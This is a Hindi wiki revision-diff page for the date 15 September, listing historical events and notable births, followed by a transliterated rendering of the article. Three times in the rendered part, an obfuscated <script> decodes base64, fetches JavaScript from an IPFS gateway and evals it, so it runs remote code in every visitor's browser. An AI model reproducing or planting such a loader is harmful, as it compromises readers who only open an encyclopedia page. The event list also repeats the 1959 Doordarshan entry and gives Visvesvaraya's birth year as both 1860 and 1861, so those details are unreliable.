Difference between revisions of "15 सितंबर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 2: Line 2:
  
 
[[ग्रेगोरी कैलंडर]] के अनुसार 15 सितंबर [[वर्ष]] का 258 वाँ ([[लीप वर्ष]] में यह 259 वाँ) दिन है। साल में अभी और 107 दिन शेष हैं।
 
[[ग्रेगोरी कैलंडर]] के अनुसार 15 सितंबर [[वर्ष]] का 258 वाँ ([[लीप वर्ष]] में यह 259 वाँ) दिन है। साल में अभी और 107 दिन शेष हैं।
 +
  
 
==15 सितंबर की महत्त्वपूर्ण घटनाएँ==
 
==15 सितंबर की महत्त्वपूर्ण घटनाएँ==
 +
* 1812 - नेपोलियन के नेतृत्व में फ्रांसीसी सेना मास्को के क्रैमलिन पहुंची।
 
* [[1959]] - [[भारत]] की राष्ट्रीय प्रसारण सेवा दूरदर्शन की शुरुआत।
 
* [[1959]] - [[भारत]] की राष्ट्रीय प्रसारण सेवा दूरदर्शन की शुरुआत।
 
* [[1982]] - लेबनान के निर्वाचित राष्ट्रपति बशीर गेमायेल की पदासीन होने के पूर्व ही बम बिस्फोट में हत्या।  
 
* [[1982]] - लेबनान के निर्वाचित राष्ट्रपति बशीर गेमायेल की पदासीन होने के पूर्व ही बम बिस्फोट में हत्या।  
* [[2000]] - सिडनी में 27वें ओलम्पिक खेलों का शुभारम्भ।  
+
* [[1894]]- प्योंगयांग की लड़ाई में [[जापान]] ने [[चीन]] को करारी मात दी।
 +
* [[1916]] - प्रथम विश्व युद्ध में पहली बार सोम्मे की लड़ाई में टैंक का इस्तेमाल किया गया।
 +
* [[1948]] - स्वतंत्र भारत का पहला ध्वजपोत आईएनएस-दिल्ली बंबई(अब मुंबई) के बंदरगाह पर पहुंचा।
 +
* [[1959]] - भारत की राष्ट्रीय प्रसारण सेवा दूरदर्शन की शुरुआत हुई।
 +
* [[1971]] - हरी-भरी और शांति पूर्ण दुनिया के निर्माण के लिए प्रतिबद्ध ग्रीन पीस की स्थापना की गई।
 +
* [[1981]] - वानुअतु संयुक्त राष्ट्र संघ का सदस्य बना।
 +
* [[2000]] - सिडनी में 27वें [[ओलम्पिक खेल|ओलम्पिक खेलों]] का शुभारम्भ।  
 
* [[2001]] - अमेरिकी सीनेट ने राष्ट्रपति को अफ़ग़ानिस्तान पर सैनिक कार्यवाही की मंजूरी दी।  
 
* [[2001]] - अमेरिकी सीनेट ने राष्ट्रपति को अफ़ग़ानिस्तान पर सैनिक कार्यवाही की मंजूरी दी।  
 
* [[2002]] - न्यूयार्क में संयुक्त राष्ट्र महासभा की बैठक के अवसर पर भारत, चीन एवं रूस के विदेश मंत्रियों की बैठक आयोजित, थाईलैंड के सट्टाहिम में श्रीलंका सरकार व लिट्टे के बीच सीधी वार्ता शुरू।  
 
* [[2002]] - न्यूयार्क में संयुक्त राष्ट्र महासभा की बैठक के अवसर पर भारत, चीन एवं रूस के विदेश मंत्रियों की बैठक आयोजित, थाईलैंड के सट्टाहिम में श्रीलंका सरकार व लिट्टे के बीच सीधी वार्ता शुरू।  
Line 16: Line 24:
 
* [[1946]] - [[जॉकिन अर्पुथम]] - [[मुम्बई]] की झुग्गी बस्तियों के लिए संघर्ष करने वाले व्यक्ति।
 
* [[1946]] - [[जॉकिन अर्पुथम]] - [[मुम्बई]] की झुग्गी बस्तियों के लिए संघर्ष करने वाले व्यक्ति।
 
* 973 - [[अलबेरूनी]] - एक फ़ारसी विद्वान लेखक, वैज्ञानिक, धर्मज्ञ तथा विचारक।
 
* 973 - [[अलबेरूनी]] - एक फ़ारसी विद्वान लेखक, वैज्ञानिक, धर्मज्ञ तथा विचारक।
 +
* [[1860]] - भारतीय इंजीनियर, विद्वान राजनेता और मैसूर राज्य के दीवान रहे विश्वेश्वरैया का जन्म।
 
* [[1861]] - [[मोक्षगुंडम विश्वेश्वरैया]], इंजीनियर, वैज्ञानिक और निर्माता।
 
* [[1861]] - [[मोक्षगुंडम विश्वेश्वरैया]], इंजीनियर, वैज्ञानिक और निर्माता।
 
* [[1876]] - [[शरत चंद्र चट्टोपाध्याय]], भारतीय [[उपन्यासकार]]।
 
* [[1876]] - [[शरत चंद्र चट्टोपाध्याय]], भारतीय [[उपन्यासकार]]।

Revision as of 08:25, 4 October 2016

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

gregori kailandar ke anusar 15 sitanbar varsh ka 258 vaan (lip varsh mean yah 259 vaan) din hai. sal mean abhi aur 107 din shesh haian.


15 sitanbar ki mahattvapoorn ghatanaean

  • 1812 - nepoliyan ke netritv mean phraansisi sena masko ke kraimalin pahuanchi.
  • 1959 - bharat ki rashtriy prasaran seva dooradarshan ki shuruat.
  • 1982 - lebanan ke nirvachit rashtrapati bashir gemayel ki padasin hone ke poorv hi bam bisphot mean hatya.
  • 1894- pyoangayaang ki l daee mean japan ne chin ko karari mat di.
  • 1916 - pratham vishv yuddh mean pahali bar somme ki l daee mean taiank ka istemal kiya gaya.
  • 1948 - svatantr bharat ka pahala dhvajapot aeeenes-dilli banbee(ab muanbee) ke bandaragah par pahuancha.
  • 1959 - bharat ki rashtriy prasaran seva dooradarshan ki shuruat huee.
  • 1971 - hari-bhari aur shaanti poorn duniya ke nirman ke lie pratibaddh grin pis ki sthapana ki gee.
  • 1981 - vanuatu sanyukt rashtr sangh ka sadasy bana.
  • 2000 - sidani mean 27vean olampik kheloan ka shubharambh.
  • 2001 - ameriki sinet ne rashtrapati ko afaganistan par sainik karyavahi ki manjoori di.
  • 2002 - nyooyark mean sanyukt rashtr mahasabha ki baithak ke avasar par bharat, chin evan roos ke videsh mantriyoan ki baithak ayojit, thaeelaiand ke sattahim mean shrilanka sarakar v litte ke bich sidhi varta shuroo.
  • 2003 - siangapur ke mudde par vikasashil deshoan ke bh dak uthane se dablyootio varta viphal.
  • 2004 - british nagarik guriandar chaddha ko 'voomain af d eeyar' samman.
  • 2008 - krampatan gibs ne amerika ki emesaee grup kanpani ka adhigrahan kiya.
  • 2009 - bangaloor ke muandir shivaraji ne sab jooniyar biliyards ka khitab jita. penasula phauandeshan ke cheyaramain subrato chatopadhyay 2009-10 ke lie adit byooro aph sarkuleshan ke adhyaksh chune gaye.

15 sitanbar ko janme vyakti

15 sitanbar ko hue nidhan

15 sitanbar ke mahattvapoorn avasar evan utsav

bahari k diyaan

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>